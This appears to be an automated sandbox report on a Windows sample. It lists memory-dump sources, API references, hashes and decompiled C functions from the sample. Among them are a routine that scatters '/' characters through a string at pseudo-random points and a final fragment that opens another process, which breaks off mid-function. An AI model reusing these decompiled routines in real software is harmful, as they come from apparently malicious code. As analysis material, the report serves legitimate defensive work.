                                                                                                                          • task.LIBCPMTD ref: 6E2EF96B
                                                                                                                          • Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6E2EF980
                                                                                                                          • task.LIBCPMTD ref: 6E2EF998
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2520070614-0
                                                                                                                          • Opcode ID: 75c8011f847f043b47264a8f42b196f1f00d33fb983914530ff751fd912789c6
                                                                                                                          • Instruction ID: 0f3554e01893dbeacae2ab6a00d8e5bf714f7af641b3e09a5ac8247c2286d4fe
                                                                                                                          • Opcode Fuzzy Hash: 75c8011f847f043b47264a8f42b196f1f00d33fb983914530ff751fd912789c6
                                                                                                                          • Instruction Fuzzy Hash: 96212A75D0025CEBCB05DFE4C850BDEBBB9BF48314F508569E429AB694DB346A05CB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 68%
                                                                                                                          			E04CD26DD(unsigned int __eax, void* __ecx) {
                                                                                                                          				void* _v8;
                                                                                                                          				void* _v12;
                                                                                                                          				signed int _t21;
                                                                                                                          				signed short _t23;
                                                                                                                          				char* _t27;
                                                                                                                          				void* _t29;
                                                                                                                          				void* _t30;
                                                                                                                          				unsigned int _t33;
                                                                                                                          				void* _t37;
                                                                                                                          				unsigned int _t38;
                                                                                                                          				void* _t41;
                                                                                                                          				void* _t42;
                                                                                                                          				int _t45;
                                                                                                                          				void* _t46;
                                                                                                                          
                                                                                                                          				_t42 = __eax;
                                                                                                                          				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                                                                                                          				_t38 = __eax;
                                                                                                                          				_t30 = RtlAllocateHeap( *0x4cdd270, 0, (__eax >> 3) + __eax + 1);
                                                                                                                          				_v12 = _t30;
                                                                                                                          				if(_t30 != 0) {
                                                                                                                          					_v8 = _t42;
                                                                                                                          					do {
                                                                                                                          						_t33 = 0x18;
                                                                                                                          						if(_t38 <= _t33) {
                                                                                                                          							_t33 = _t38;
                                                                                                                          						}
                                                                                                                          						_t21 =  *0x4cdd288; // 0x232ec7ae
                                                                                                                          						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                                                                                                          						 *0x4cdd288 = _t23;
                                                                                                                          						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                                                                                                          						memcpy(_t30, _v8, _t45);
                                                                                                                          						_v8 = _v8 + _t45;
                                                                                                                          						_t27 = _t30 + _t45;
                                                                                                                          						_t38 = _t38 - _t45;
                                                                                                                          						_t46 = _t46 + 0xc;
                                                                                                                          						 *_t27 = 0x2f;
                                                                                                                          						_t13 = _t27 + 1; // 0x1
                                                                                                                          						_t30 = _t13;
                                                                                                                          					} while (_t38 > 8);
                                                                                                                          					memcpy(_t30, _v8, _t38 + 1);
                                                                                                                          				}
                                                                                                                          				return _v12;
                                                                                                                          			}


















                                                                                                                          APIs
                                                                                                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04CD1A07,00000000,?,?,04CD4653,?,058B95B0), ref: 04CD26E8
                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04CD2700
                                                                                                                          • memcpy.NTDLL(00000000,?,-00000008,?,?,?,04CD1A07,00000000,?,?,04CD4653,?,058B95B0), ref: 04CD2744
                                                                                                                          • memcpy.NTDLL(00000001,?,00000001), ref: 04CD2765
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy$AllocateHeaplstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1819133394-0
                                                                                                                          • Opcode ID: 720c3384a9c9c834397d340060ca56783e76635123f9190f380db0181bd3d9f0
                                                                                                                          • Instruction ID: 9a5d60dbfeb5fbaf7b1c359b0bf681966decf32a3dff56784c7b71bb36246a20
                                                                                                                          • Opcode Fuzzy Hash: 720c3384a9c9c834397d340060ca56783e76635123f9190f380db0181bd3d9f0
                                                                                                                          • Instruction Fuzzy Hash: 4311E976A01214BFD710CE69DC88E9EBBBFDBC0261B150276F505D7250EA74AE44D760
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F1E36
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F1E43
                                                                                                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E2F1E80
                                                                                                                            • Part of subcall function 6E2F0FAE: _Yarn.LIBCPMT ref: 6E2F0FCD
                                                                                                                            • Part of subcall function 6E2F0FAE: _Yarn.LIBCPMT ref: 6E2F0FF1
                                                                                                                          • std::exception::exception.LIBCMTD ref: 6E2F1EA5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: Yarnstd::_$H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_std::exception::exception
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2425033533-0
                                                                                                                          • Opcode ID: 9f599ae5ba6e4c72b85829a60312cb4cb26266cc690e4f4f23c0ac55cb7ecfa5
                                                                                                                          • Instruction ID: 1f70904abe65f5a8d22576a217788624dc40db0cd044a8eb3a8020751b94b1a1
                                                                                                                          • Opcode Fuzzy Hash: 9f599ae5ba6e4c72b85829a60312cb4cb26266cc690e4f4f23c0ac55cb7ecfa5
                                                                                                                          • Instruction Fuzzy Hash: F20180B5805748DFC7208FAA948058BFFE5BF28254B808A2FE5CE87A01D7309545CB99
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E04CD4450() {
                                                                                                                          				void* _t1;
                                                                                                                          				intOrPtr _t5;
                                                                                                                          				void* _t6;
                                                                                                                          				void* _t7;
                                                                                                                          				void* _t11;
                                                                                                                          
                                                                                                                          				_t1 =  *0x4cdd2a4; // 0x2ec
                                                                                                                          				if(_t1 == 0) {
                                                                                                                          					L8:
                                                                                                                          					return 0;
                                                                                                                          				}
                                                                                                                          				SetEvent(_t1);
                                                                                                                          				_t11 = 0x7fffffff;
                                                                                                                          				while(1) {
                                                                                                                          					SleepEx(0x64, 1);
                                                                                                                          					_t5 =  *0x4cdd2f4; // 0x0
                                                                                                                          					if(_t5 == 0) {
                                                                                                                          						break;
                                                                                                                          					}
                                                                                                                          					_t11 = _t11 - 0x64;
                                                                                                                          					if(_t11 > 0) {
                                                                                                                          						continue;
                                                                                                                          					}
                                                                                                                          					break;
                                                                                                                          				}
                                                                                                                          				_t6 =  *0x4cdd2a4; // 0x2ec
                                                                                                                          				if(_t6 != 0) {
                                                                                                                          					CloseHandle(_t6);
                                                                                                                          				}
                                                                                                                          				_t7 =  *0x4cdd270; // 0x54c0000
                                                                                                                          				if(_t7 != 0) {
                                                                                                                          					HeapDestroy(_t7);
                                                                                                                          				}
                                                                                                                          				goto L8;
                                                                                                                          			}









                                                                                                                          APIs
                                                                                                                          • SetEvent.KERNEL32(000002EC,00000001,04CD191C), ref: 04CD445B
                                                                                                                          • SleepEx.KERNEL32(00000064,00000001), ref: 04CD446A
                                                                                                                          • CloseHandle.KERNEL32(000002EC), ref: 04CD448B
                                                                                                                          • HeapDestroy.KERNEL32(054C0000), ref: 04CD449B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseDestroyEventHandleHeapSleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4109453060-0
                                                                                                                          • Opcode ID: 617fd483e6e309d4bd7de7ca164c8d5660e77e581546af69840d252bb525345a
                                                                                                                          • Instruction ID: a2624705560e2907dc329489e3466f8b9a06d7e611fea7ab33c74098d18f8ef0
                                                                                                                          • Opcode Fuzzy Hash: 617fd483e6e309d4bd7de7ca164c8d5660e77e581546af69840d252bb525345a
                                                                                                                          • Instruction Fuzzy Hash: 69F03079B023129BEF246F35E988B5636ADEB04769B050214BA06E7180DB38ED84C664
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,6E346602,00000000,00000001,00000000,00000000,?,6E344244,00000000,00000020,00000000), ref: 6E34887E
                                                                                                                          • GetLastError.KERNEL32(?,6E346602,00000000,00000001,00000000,00000000,?,6E344244,00000000,00000020,00000000,00000000,00000000,?,6E3447A9,00000000), ref: 6E34888A
                                                                                                                            • Part of subcall function 6E348850: CloseHandle.KERNEL32(6E37AA20,6E34889A,?,6E346602,00000000,00000001,00000000,00000000,?,6E344244,00000000,00000020,00000000,00000000,00000000), ref: 6E348860
                                                                                                                          • ___initconout.LIBCMT ref: 6E34889A
                                                                                                                            • Part of subcall function 6E348812: CreateFileW.KERNEL32(6E373F04,40000000,00000003,00000000,00000003,00000000,00000000,6E348841,6E3465EF,00000000,?,6E344244,00000000,00000020,00000000,00000000), ref: 6E348825
                                                                                                                          • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,6E346602,00000000,00000001,00000000,00000000,?,6E344244,00000000,00000020,00000000,00000000), ref: 6E3488AF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2744216297-0
                                                                                                                          • Opcode ID: c91a42db09f3ef581c8e53f63e853d7905be6b9720f1344e63d39fa405beb635
                                                                                                                          • Instruction ID: 578db517e26acda104cf8bda7d6b88d60c01c71f05b3fc5aac2609e43c5ab1ea
                                                                                                                          • Opcode Fuzzy Hash: c91a42db09f3ef581c8e53f63e853d7905be6b9720f1344e63d39fa405beb635
                                                                                                                          • Instruction Fuzzy Hash: F2F03036010624FBCF522FD5CC0899D3F7AFB493A0B104420FA1986124CB32C830EBD4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 37%
                                                                                                                          			E04CD4B98() {
                                                                                                                          				void* _v0;
                                                                                                                          				void** _t3;
                                                                                                                          				void** _t5;
                                                                                                                          				void** _t7;
                                                                                                                          				void** _t8;
                                                                                                                          				void* _t10;
                                                                                                                          
                                                                                                                          				_t3 =  *0x4cdd364; // 0x58b95b0
                                                                                                                          				__imp__( &(_t3[0x10]));
                                                                                                                          				while(1) {
                                                                                                                          					_t5 =  *0x4cdd364; // 0x58b95b0
                                                                                                                          					_t1 =  &(_t5[0x16]); // 0x0
                                                                                                                          					if( *_t1 == 0) {
                                                                                                                          						break;
                                                                                                                          					}
                                                                                                                          					Sleep(0xa);
                                                                                                                          				}
                                                                                                                          				_t7 =  *0x4cdd364; // 0x58b95b0
                                                                                                                          				_t10 =  *_t7;
                                                                                                                          				if(_t10 != 0 && _t10 != 0x4cde823) {
                                                                                                                          					HeapFree( *0x4cdd270, 0, _t10);
                                                                                                                          					_t7 =  *0x4cdd364; // 0x58b95b0
                                                                                                                          				}
                                                                                                                          				 *_t7 = _v0;
                                                                                                                          				_t8 =  &(_t7[0x10]);
                                                                                                                          				__imp__(_t8);
                                                                                                                          				return _t8;
                                                                                                                          			}










                                                                                                                          APIs
                                                                                                                          • RtlEnterCriticalSection.NTDLL(058B9570), ref: 04CD4BA1
                                                                                                                          • Sleep.KERNEL32(0000000A,?,04CD5390), ref: 04CD4BAB
                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,04CD5390), ref: 04CD4BD9
                                                                                                                          • RtlLeaveCriticalSection.NTDLL(058B9570), ref: 04CD4BEE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 58946197-0
                                                                                                                          • Opcode ID: 382d1806ac92f47be00c2105c2ff41f929eb47c258c38e8fd6935a994bb83183
                                                                                                                          • Instruction ID: 3a23e8c0c44271189c6dc59e40794284c2fa985c87c415027387eacda5883e5a
                                                                                                                          • Opcode Fuzzy Hash: 382d1806ac92f47be00c2105c2ff41f929eb47c258c38e8fd6935a994bb83183
                                                                                                                          • Instruction Fuzzy Hash: 2AF0D4BCA06600ABEB189F65EA99F2677B9FF55310B044019F603DB250C638FC00DA14
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: _free
                                                                                                                          • String ID: -
                                                                                                                          • API String ID: 269201875-2547889144
                                                                                                                          • Opcode ID: ff176372c32bbe63ee58e99579d8badc4d8a1849a9b4cd7d7d04c74d24b0931a
                                                                                                                          • Instruction ID: 1081a546e9059cf6c094a0deb9376b3a81745d8852a5f8224b7fd0ae3c84bd37
                                                                                                                          • Opcode Fuzzy Hash: ff176372c32bbe63ee58e99579d8badc4d8a1849a9b4cd7d7d04c74d24b0931a
                                                                                                                          • Instruction Fuzzy Hash: F6C108319002B69ADB64DFE4CE50FEAB3B8FF14714F3045AAD84597185FB329A81CB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 6E2F0170: _Max_value.LIBCPMTD ref: 6E2F019C
                                                                                                                            • Part of subcall function 6E2F0170: _Min_value.LIBCPMTD ref: 6E2F01C2
                                                                                                                          • allocator.LIBCONCRTD ref: 6E2EA798
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: Max_valueMin_valueallocator
                                                                                                                          • String ID: 2t.n$2t.n
                                                                                                                          • API String ID: 2697025138-4282282858
                                                                                                                          • Opcode ID: b26ea5b7fc720cee6dff34bcc786ccfdbafdac2deae19289cc34da474882f705
                                                                                                                          • Instruction ID: 78e6eab7611aae2889963efc393e5de1636fcf01ba8558227938186bbf55f6a0
                                                                                                                          • Opcode Fuzzy Hash: b26ea5b7fc720cee6dff34bcc786ccfdbafdac2deae19289cc34da474882f705
                                                                                                                          • Instruction Fuzzy Hash: B1A107B5D0015D9FCB08DFE8D890AEEBBBABF88304F548959E415B7754DB34A901CB60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __startOneArgErrorHandling.LIBCMT ref: 6E327B2D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorHandling__start
                                                                                                                          • String ID: pow
                                                                                                                          • API String ID: 3213639722-2276729525
                                                                                                                          • Opcode ID: 49df0c7b69f1d53f5300d01ef8be082918b0a9f3b84ad72f033ef8bbb2d9fa0b
                                                                                                                          • Instruction ID: 8097282bc89366fb5bcb6b8824dafd5a6599f32b66fa0e88b29f05b443dd97f4
                                                                                                                          • Opcode Fuzzy Hash: 49df0c7b69f1d53f5300d01ef8be082918b0a9f3b84ad72f033ef8bbb2d9fa0b
                                                                                                                          • Instruction Fuzzy Hash: 0F518A61E18253DECB8176F5C950BAB7BB8FB41750F304D78F4E1822D8EB3384959A86
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: swap
                                                                                                                          • String ID: Dq6n$Dq6n
                                                                                                                          • API String ID: 630424929-2865934346
                                                                                                                          • Opcode ID: fe4135ac29e82f4b7dd3802219cc43c0494b2193611aeb934832d80036543693
                                                                                                                          • Instruction ID: 16b371194dd3bcc28199cf24f8d1eef3749034636c3fd491b62ca37e59106d83
                                                                                                                          • Opcode Fuzzy Hash: fe4135ac29e82f4b7dd3802219cc43c0494b2193611aeb934832d80036543693
                                                                                                                          • Instruction Fuzzy Hash: 30F0FE7AD0021CABCB04DFD4DD518DD777DAF55205F5048AAE80557744EB30AF14DBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 58%
                                                                                                                          			E04CD1EC1(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                                                                                                          				intOrPtr* _v8;
                                                                                                                          				void* _t17;
                                                                                                                          				intOrPtr* _t22;
                                                                                                                          				void* _t27;
                                                                                                                          				char* _t30;
                                                                                                                          				void* _t33;
                                                                                                                          				void* _t34;
                                                                                                                          				void* _t36;
                                                                                                                          				void* _t37;
                                                                                                                          				void* _t39;
                                                                                                                          				int _t42;
                                                                                                                          
                                                                                                                          				_t17 = __eax;
                                                                                                                          				_t37 = 0;
                                                                                                                          				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                                                                                                          				_t2 = _t17 + 1; // 0x1
                                                                                                                          				_t28 = _t2;
                                                                                                                          				_t34 = E04CD75F6(_t2);
                                                                                                                          				if(_t34 != 0) {
                                                                                                                          					_t30 = E04CD75F6(_t28);
                                                                                                                          					if(_t30 == 0) {
                                                                                                                          						E04CD4AAB(_t34);
                                                                                                                          					} else {
                                                                                                                          						_t39 = _a4;
                                                                                                                          						_t22 = E04CDA971(_t39);
                                                                                                                          						_v8 = _t22;
                                                                                                                          						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                                                                                                          							_a4 = _t39;
                                                                                                                          						} else {
                                                                                                                          							_t26 = _t22 + 2;
                                                                                                                          							_a4 = _t22 + 2;
                                                                                                                          							_t22 = E04CDA971(_t26);
                                                                                                                          							_v8 = _t22;
                                                                                                                          						}
                                                                                                                          						if(_t22 == 0) {
                                                                                                                          							__imp__(_t34, _a4);
                                                                                                                          							 *_t30 = 0x2f;
                                                                                                                          							 *((char*)(_t30 + 1)) = 0;
                                                                                                                          						} else {
                                                                                                                          							_t42 = _t22 - _a4;
                                                                                                                          							memcpy(_t34, _a4, _t42);
                                                                                                                          							 *((char*)(_t34 + _t42)) = 0;
                                                                                                                          							__imp__(_t30, _v8);
                                                                                                                          						}
                                                                                                                          						 *_a8 = _t34;
                                                                                                                          						_t37 = 1;
                                                                                                                          						 *_a12 = _t30;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				return _t37;
                                                                                                                          			}

                                                                                                                          APIs
                                                                                                                          • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,04CD5405,00000000,00000000,73BB81D0,058B9618,?,?,04CD2A8A,?,058B9618), ref: 04CD1ECD
                                                                                                                            • Part of subcall function 04CD75F6: RtlAllocateHeap.NTDLL(00000000,00000000,04CD4F70), ref: 04CD7602
                                                                                                                            • Part of subcall function 04CDA971: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04CD1EFB,00000000,00000001,00000001,?,?,04CD5405,00000000,00000000,73BB81D0,058B9618), ref: 04CDA97F
                                                                                                                            • Part of subcall function 04CDA971: StrChrA.SHLWAPI(?,0000003F,?,?,04CD5405,00000000,00000000,73BB81D0,058B9618,?,?,04CD2A8A,?,058B9618,0000EA60,?), ref: 04CDA989
                                                                                                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04CD5405,00000000,00000000,73BB81D0,058B9618,?,?,04CD2A8A), ref: 04CD1F2B
                                                                                                                          • lstrcpy.KERNEL32(00000000,73BB81D0), ref: 04CD1F3B
                                                                                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04CD1F47
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3767559652-0
                                                                                                                          • Opcode ID: 62abeabee0ebf7f60d5e88d9207d6175076babc6bb0e070be6f60e26e959680c
                                                                                                                          • Instruction ID: 744343059a7896e8eb086f13288707336d5a9ea882adfc308d7a60e19c503718
                                                                                                                          • Opcode Fuzzy Hash: 62abeabee0ebf7f60d5e88d9207d6175076babc6bb0e070be6f60e26e959680c
                                                                                                                          • Instruction Fuzzy Hash: F621E436504255AFDB066F74C884BAA7FBAEF05294F088055FA049B201EB35EA00D7A0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E04CD131E(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                                                                                          				void* _v8;
                                                                                                                          				void* _t18;
                                                                                                                          				int _t25;
                                                                                                                          				int _t29;
                                                                                                                          				int _t34;
                                                                                                                          
                                                                                                                          				_t29 = lstrlenW(_a4);
                                                                                                                          				_t25 = lstrlenW(_a8);
                                                                                                                          				_t18 = E04CD75F6(_t25 + _t29 + _t25 + _t29 + 2);
                                                                                                                          				_v8 = _t18;
                                                                                                                          				if(_t18 != 0) {
                                                                                                                          					_t34 = _t29 + _t29;
                                                                                                                          					memcpy(_t18, _a4, _t34);
                                                                                                                          					_t10 = _t25 + 2; // 0x2
                                                                                                                          					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                                                                                                          				}
                                                                                                                          				return _v8;
                                                                                                                          			}

                                                                                                                          APIs
                                                                                                                          • lstrlenW.KERNEL32(004F0053,?,73B75520,00000008,058B9364,?,04CD50AD,004F0053,058B9364,?,?,?,?,?,?,04CD54EF), ref: 04CD132E
                                                                                                                          • lstrlenW.KERNEL32(04CD50AD,?,04CD50AD,004F0053,058B9364,?,?,?,?,?,?,04CD54EF), ref: 04CD1335
                                                                                                                            • Part of subcall function 04CD75F6: RtlAllocateHeap.NTDLL(00000000,00000000,04CD4F70), ref: 04CD7602
                                                                                                                          • memcpy.NTDLL(00000000,004F0053,73B769A0,?,?,04CD50AD,004F0053,058B9364,?,?,?,?,?,?,04CD54EF), ref: 04CD1355
                                                                                                                          • memcpy.NTDLL(73B769A0,04CD50AD,00000002,00000000,004F0053,73B769A0,?,?,04CD50AD,004F0053,058B9364), ref: 04CD1368
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlenmemcpy$AllocateHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2411391700-0
                                                                                                                          • Opcode ID: bf03378638d65f9067c3541598caddcf2c338e9a5a273d99d1e5840be836dcd6
                                                                                                                          • Instruction ID: 2404951a194db94d5bbc289c9803e86dac983618f989b42cad5e84c2ae492ac9
                                                                                                                          • Opcode Fuzzy Hash: bf03378638d65f9067c3541598caddcf2c338e9a5a273d99d1e5840be836dcd6
                                                                                                                          • Instruction Fuzzy Hash: 5BF0F976900119BBDF11EFA9CC88C9F7BADEF492987154066FE04D7201EA35EA14DBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • lstrlen.KERNEL32(058B9B10,00000000,00000000,745EC740,04CD467E,00000000), ref: 04CD38DA
                                                                                                                          • lstrlen.KERNEL32(?), ref: 04CD38E2
                                                                                                                            • Part of subcall function 04CD75F6: RtlAllocateHeap.NTDLL(00000000,00000000,04CD4F70), ref: 04CD7602
                                                                                                                          • lstrcpy.KERNEL32(00000000,058B9B10), ref: 04CD38F6
                                                                                                                          • lstrcat.KERNEL32(00000000,?), ref: 04CD3901
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 74227042-0
                                                                                                                          • Opcode ID: d866156b59c5d745ac7f50d58db5d0b08da229d2f834233e04459d057cd0707a
                                                                                                                          • Instruction ID: e44e7fb19f573f7c4b72cfa8d10d0856b6b1c7e6cb5134b0da5fa93299c9b4cc
                                                                                                                          • Opcode Fuzzy Hash: d866156b59c5d745ac7f50d58db5d0b08da229d2f834233e04459d057cd0707a
                                                                                                                          • Instruction Fuzzy Hash: 1CE09A37902620AB8711ABE8AC48D6BBFAEEF896607040416FB00D3100C739AD11CBA2
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Executed Functions

                                                                                                                          C-Code - Quality: 38%
                                                                                                                          			E04975D10(char _a4, void* _a8) {
                                                                                                                          				void* _v8;
                                                                                                                          				void* _v12;
                                                                                                                          				char _v16;
                                                                                                                          				void* _v20;
                                                                                                                          				char _v24;
                                                                                                                          				char _v28;
                                                                                                                          				char _v32;
                                                                                                                          				char _v36;
                                                                                                                          				char _v40;
                                                                                                                          				void* _v44;
                                                                                                                          				void** _t33;
                                                                                                                          				void* _t40;
                                                                                                                          				void* _t43;
                                                                                                                          				void** _t44;
                                                                                                                          				intOrPtr* _t47;
                                                                                                                          				char _t48;
                                                                                                                          
                                                                                                                          				asm("stosd");
                                                                                                                          				asm("stosd");
                                                                                                                          				asm("stosd");
                                                                                                                          				asm("stosd");
                                                                                                                          				asm("stosd");
                                                                                                                          				_v20 = _a4;
                                                                                                                          				_t48 = 0;
                                                                                                                          				_v16 = 0;
                                                                                                                          				_a4 = 0;
                                                                                                                          				_v44 = 0x18;
                                                                                                                          				_v40 = 0;
                                                                                                                          				_v32 = 0;
                                                                                                                          				_v36 = 0;
                                                                                                                          				_v28 = 0;
                                                                                                                          				_v24 = 0;
                                                                                                                          				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                                                                                                          					_t33 =  &_v8;
                                                                                                                          					__imp__(_v12, 8, _t33);
                                                                                                                          					if(_t33 >= 0) {
                                                                                                                          						_t47 = __imp__;
                                                                                                                          						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                                                                                                          						_t44 = E049775F6(_a4);
                                                                                                                          						if(_t44 != 0) {
